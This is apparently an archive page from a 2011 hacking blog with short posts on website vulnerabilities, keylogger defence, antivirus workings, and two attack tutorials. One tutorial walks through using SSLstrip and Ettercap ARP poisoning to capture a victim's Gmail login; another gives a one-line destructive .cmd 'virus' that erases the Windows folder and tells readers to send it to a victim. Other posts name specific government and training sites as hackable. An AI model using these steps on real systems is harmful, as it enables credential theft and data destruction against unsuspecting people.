Friday, August 26, 2011

the chennaitrainings website is vulnerable to sql injection


THE 496 REGISTERED TRAINING CENTER ADMIN LOGIN PAGE CAN BE HACKABLE
i report to the admin to close the loop hole 

Thursday, August 25, 2011

How to Protect Your Computer from Keyloggers


Protect from Keyloggers
Keyloggers have been a major problem today as it does not require any prior knowledge of computers to use it. So hackers mainly use keyloggers to steal your passwords, credit card numbers and other confidential data. Below are some methods through which you can protect your computer from keyloggers:

Use a Good Antivirus

This is the first and basic step that you need to take in order to protect your computer from keyloggers. Use a Good antivirus such as Kaspersky, Norton or Mcafee and update it regularly.

Use a Good Antispyware

Since keyloggers are basically spywares, if you are a frequent user of Internet then you could be exposed to thousands of keyloggers and spywares. So you should use a good antispyware such as NoAdware.

Antilogger can be Handy

Antiloggers are programs that detect the presence of keyloggers on a given computer. Over past few years, I have tested a lot of anti-logging programs and have found Zemana Antilogger as the best antilogger.
Zemana
Normally a keylogger can be easily detected by a Good Antivirus program, but hackers use some methods such as hexing, binding, crypting and similar techniques to make it harder to be detected by antivirus programs. In this case Zemana Antilogger comes handy as the program is specially developed to protect your system against harmful keyloggers.
Zemana Antilogger

Online Scanning

When ever you receive a suspicious file, you scan it with online scanners such as Multi engine antivirus scanner which scans your file with 24 antivirus engines and reports it back to you if the file is recognized as a virus or spyware. This ensures that none of the malicious programs can escape from being detected as there are 24 different antivirus engines are involved in the scanning process.

Sandboxie

Sandboxie is another great program to help you protect your computer against harmful keyloggers and spywares. Sandboxie runs your computer in an isolated space which prevents your program from making permanent changes to other programs in your computer.
When ever you receive a file that looks suspicious, just run the program with Sandboxie so even if it is a keylogger or any other virus it will not make permanent changes to your computer system.
Sandboxie
To run a program in Sandboxie follow the steps as mentioned below:
1. Open sandboxie and click on sandbox menu on the top
2. Now goto Default sandbox
3. Then click on run any program
4. Now select the file you wish to run in sandboxie and click open

Keyscrambler

Keyscrambler is one of the best protection against keyloggers that you can have, Keyscrambler is a small program which encrypts your typed keystrokes so even if the victim has installed a keylogger on your system, he or she will get encrypted keys. Keyscrambler currently supports Firefox, Internet explorer and other applications, however its premium version supports more than 160 applications.

Sunday, August 21, 2011

Man In The Middle Attack - SSL Hacking


One of the most successful way of gaining information such as passwords,user ids etc in LAN (local area network) is through man in the middle attacks . I will not be going to deep into Man in the middle attacks, but in simple words it can be explained as attacker or a hacker listening to all the information sent in between the client and the server .To prevent these kind of attacks Email providers started using Hypertext Transfer ProtocolSecure (HTTPS) It is a combination of the Hypertext TransferProtocol(HTTP) with SSL (Secure socket layer )protocol to provide encrypted communication between the client and the server .So when a hacker caries out a Mimt attack the victim is cautioned with a invalid SSL Certificate



In this tutorial I will teach how to carry out a successful Mitm attack

Concept :-

We Know that HTTP (Hypertext Transfer Protocol )simply sends all the information through plain text .So if we make the victim use HTTP instead of HTTPS to connect sites like Gmail , Pay pal. we will be able to carry out a successful Mitm attack with out causing any suspicion To do this we are going to use a tool called SSL strip

Read MoreWhat is SSL(Secure Socket Layer) 

Thing we Need 

1. SSL strip: You can search Google for SSL strip it comes both in windows and Linux versions . I will be using the windows version in this tutorial

2. Ettercap to carry out mitm attacks

Demonstration :- 

1. Open SSL strip and fill in all the required information for arpsoof, network ,ssl strip, change data .If you don’t know what to enter simply click auto check . remember to check if HTTPS to HTTP is included in Change data , finally click ok



2. Now select the victim’s IP and click open


3. Now open ettercap go to sniff -unsniffed sniffing and select your network interface and click ok 



4. Now select hosts-scan hosts .Once scanning is completed .Open host list from hosts tab .Now select the IP address of the router as target 1 and the victims IP as target 2



5. Now select mitm-arp poisoning and click ok as shown



6. Finally select start-start sniffing .Now when the victim logs into gmail he will be using HTTPand not HTTPS Hence we are able to get the User id ,passwords as shown below



Counter measures: 

1. whenever you perform an online transaction such as Credit card payment, Bank login or Email login always ensure that you Use HTTPS 

2. Always check the SSL certificate before doing an online transaction

Monday, August 15, 2011

Monday, August 8, 2011

Andhra Pradesh government Housing board website can hackable

i report to admin of website to close the loop hole soon as possible i attach i screen shot of vulnerable page



next screen shot 

Sunday, August 7, 2011

Make virus in just one minute


CAUTION: DO NOT RUN THIS PROGRAM  ON YOUR COMPUTER OR YOU WILL LOSE YOUR WINDOWS.


HERE'S THE To Make the virus:
1.Go to notepad
2. Type erase C:\WINDOWS, 
3. Save IT AS SOMETHING.cmd , 
4. Send to victim, once the victim opens it, the map WINDOWS will be gone and have to install WINDOWS again...

How does this works?
The working of this virus is very simple,Once the victim runs the .cmd file on his computer,This virus will just erase the windows file causing the computer to crash.

Take care it is a simple but powerful virus.

Thursday, August 4, 2011

Wednesday, August 3, 2011

How Antivirus Software Works

Hi guys today i going to share few concepts about how antivirus working in pc or all laptops .Due to many malicious programs the many company release the there own programs to stop all malicious programs to prevent damage to your pc's .Let we discuss the step by step methods how antivirus working 



An antivirus software typically uses a variety of strategies in detecting and removing viruses, worms and other malware programs. The following are the two most widely employed identification methods:
 

1. Signature-based dectection (Dictionary approach)

 
This is the most commonly employed method which involves searching for known patterns of virus within a given file. Every antivirus software will have a dictionary of sample malware codes called signatures in it’s database. Whenever a file is examined, the antivirus refers to the dictionary of sample codes present within it’s database and compares the same with the current file. If the piece of code within the file matches with the one in it’s dictionary then it is flagged and proper action is taken immediately so as to stop the virus from further replicating. The antivirus may choose to repair the file, quarantine or delete it permanently based on it’s potential risk. 
As new viruses and malwares are created and released every day, this method of detection cannot defend against new malwares unless their samples are collected and signatures are released by the antivirus software company. Some companies may also encourage the users to upload new viruses or variants, so that the virus can be analyzed and the signature can be added to the dictionary.
Signature based detection can be very effective, but requires frequent updates of the virus signature dictionary. Hence the users must update their antivirus software on a regular basis so as to defend against new threats that are released daily.
 

2. Heuristic-based detection (Suspicious behaviour approach)

 
Heuristic-based detection involves identifying suspicious behaviour from any given program which might indicate a potential risk. This approach is used by some of the sophisticated antivirus softwares to identify new malware and variants of known malware. Unlike the signature based approach, here the antivirus doesn’t attempt to identify known viruses, but instead monitors the behavior of all programs.
For example, malicious behaviours like a program trying to write data to an executable program is flagged and the user is alerted about this action. This method of detection gives an additional level of security from unidentified threats.
File emulation: This is another type of heuristic-based approach where a given program is executed in a virtual environment and the actions performed by it are logged. Based on the actions logged, the antivirus software can determine if the program is malicious or not and carry out necessary actions in order to clean the infection.
Most commercial antivirus softwares use a combination of both signature-based and heuristic-based approaches to combat malware.
 

Issues of concern

 
Zero-day threats: A zero-day (zero-hour ) threat or attack is where a malware tries to exploit computer application vulnerabilities that are yet unidentified by the antivirus software companies. These attacks are used to cause damage to the computer even before they are identified. Since patches are not yet released for these kind of new threats, they can easily manage to bypass the antivirus software and carry out malicious actions. However most of the threats are identified after a day or two of it’s release, but damage caused by them before identification is quite inevitable.
Daily Updates: Since new viruses and threats are released everyday, it is most essential to update the antivirus software so as to keep the virus definitions up-to-date. Most softwares will have an auto-update feature so that the virus definitions are updated whenever the computer is connected to the Internet.
Effectiveness: Even though an antivirus software can catch almost every malware, it is still not 100% foolproof against all kinds of threats. As explained earlier, a zero-day threat can easily bypass the protective shield of the antivirus software. Also virus authors have tried to stay a step ahead by writing “oligomorphic“, “polymorphic” and, more recently, “metamorphic” virus codes, which will encrypt parts of themselves or otherwise modify themselves as a method of disguise, so as to not match virus signatures in the dictionary.
Thus user education is as important as antivirus software; users must be trained to practice safe surfing habits such as downloading files only from trusted websites and not blindly executing a program that is unknown or obtained from an untrusted source. I hope this article will help you understand the working of an antivirus software.